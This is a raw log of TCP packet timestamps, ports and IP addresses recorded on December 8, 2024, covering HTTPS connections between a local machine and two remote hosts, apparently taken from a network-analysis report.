                                                                          Dec 8, 2024 20:50:37.458152056 CET44349766104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:37.467456102 CET44349766104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:37.467596054 CET49766443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:37.467694044 CET49766443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:37.467705965 CET44349766104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:37.469809055 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:37.469846964 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:37.470057964 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:37.470244884 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:37.470259905 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:37.759630919 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:37.759972095 CET49767443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:50:37.759996891 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:37.760315895 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:37.760621071 CET49767443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:50:37.760684013 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:37.760744095 CET49767443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:50:37.807331085 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:38.211373091 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:38.211443901 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:38.211558104 CET49767443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:50:38.212138891 CET49767443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:50:38.212150097 CET44349767172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:50:38.510340929 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.510605097 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.510624886 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.510902882 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.511296034 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.511353016 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.511620045 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.559330940 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.735676050 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.736265898 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.736296892 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.736644030 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.736963034 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.737024069 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.737394094 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.783335924 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.961268902 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.961319923 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.961350918 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.961380005 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.961388111 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.961399078 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.961426973 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.964010000 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.964059114 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.964067936 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.972383976 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.972431898 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.972438097 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.980834961 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:38.980880976 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:38.980887890 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.030641079 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.081104040 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.134999990 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.135005951 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.156945944 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.157016993 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.157022953 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.164499998 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.164541006 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.164546013 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.172265053 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.172311068 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.172316074 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.179749966 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.179796934 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.179802895 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.184530020 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.184601068 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.184643984 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.185499907 CET49769443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.185517073 CET44349769104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.187601089 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.187649012 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.187655926 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.189862967 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.189886093 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.189943075 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.190155029 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.190165997 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.196239948 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.196293116 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.196297884 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.203125954 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.203174114 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.203178883 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.210432053 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.210477114 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.210481882 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.225328922 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.225369930 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.225373983 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.232790947 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.232839108 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.232844114 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.240225077 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.240276098 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.240282059 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.247504950 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.247553110 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.247559071 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.290642023 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.345139980 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.348866940 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.348913908 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.348920107 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.356683969 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.356740952 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.356745958 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.371023893 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.371078014 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.371083021 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.371126890 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.380223989 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.380232096 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.380281925 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.380287886 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.380326986 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.389564037 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.389570951 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.389616966 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.394947052 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.394953012 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.395014048 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.403821945 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.403875113 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.412343025 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.412404060 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.421530008 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.421592951 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.426743031 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.426801920 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.435470104 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.435529947 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.440593004 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.440646887 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.449776888 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.449843884 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.458271027 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.458327055 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.537548065 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.537697077 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.543144941 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.543201923 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.547100067 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.547158957 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.547163963 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.547174931 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.547226906 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.547245979 CET49768443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.547255039 CET44349768104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.549798012 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.549837112 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.549894094 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.550113916 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.550131083 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.708410025 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.708442926 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:39.708514929 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.708729982 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:39.708741903 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.412333012 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.412745953 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:40.412763119 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.413085938 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.413466930 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:40.413531065 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.413599014 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:40.459345102 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.759149075 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.773406029 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:40.773433924 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.773832083 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.775669098 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:40.775731087 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.775813103 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:40.819339991 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.859962940 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.860033989 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.860199928 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:40.921392918 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:40.962459087 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.219729900 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.219789028 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.219824076 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.219949961 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.219970942 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.220014095 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.220048904 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.220206022 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.220206022 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.220212936 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.228378057 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.228491068 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.228497982 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.244770050 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.244856119 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.244865894 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.254473925 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.254494905 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.254899025 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.255992889 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.256043911 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.256474972 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.256520033 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.256539106 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.272736073 CET49770443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.272754908 CET44349770104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.295025110 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.339010000 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.391199112 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.391210079 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.415227890 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.415282965 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.415290117 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.424835920 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.424895048 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.424901962 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.432862997 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.432910919 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.432918072 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.440803051 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.440872908 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.440881968 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.448678970 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.448745966 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.448751926 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.456660032 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.456722021 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.456727982 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.464926004 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.464993954 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.465001106 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.472816944 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.472888947 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.472896099 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.480675936 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.480848074 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.480859041 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.494220972 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.494278908 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.494283915 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.499907970 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.499974966 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.499982119 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.542196989 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.603213072 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.606857061 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.606904984 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.606914997 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.611862898 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.611912966 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.611918926 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.624398947 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.624449015 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.624454975 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.631098986 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.631158113 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.631164074 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.631197929 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.639756918 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.639764071 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.639807940 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.639854908 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.639889002 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.648916006 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.648924112 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.648968935 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.657865047 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.657871008 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.657916069 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.666737080 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.666793108 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.671636105 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.671689987 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.680200100 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.680255890 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.690685987 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.690732002 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.700228930 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.700278997 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.703169107 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.703231096 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.711280107 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.711328983 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.740540028 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.740667105 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.740691900 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.740725040 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.740737915 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.740776062 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.740854979 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.740896940 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.740931988 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.740936995 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.756803989 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.756856918 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.756864071 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.765139103 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.765182018 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.765187979 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.797200918 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.797255993 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.805207014 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.805263042 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.807764053 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.809473991 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.809540987 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.817693949 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.817749977 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.821113110 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.821206093 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.821261883 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.827965021 CET49771443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.827987909 CET44349771104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.859926939 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.902501106 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.902508974 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.936829090 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.936877012 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.936882973 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.943393946 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.943451881 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.943456888 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.950818062 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.950875044 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.950885057 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.959223032 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.959278107 CET49772443192.168.2.4104.18.95.41
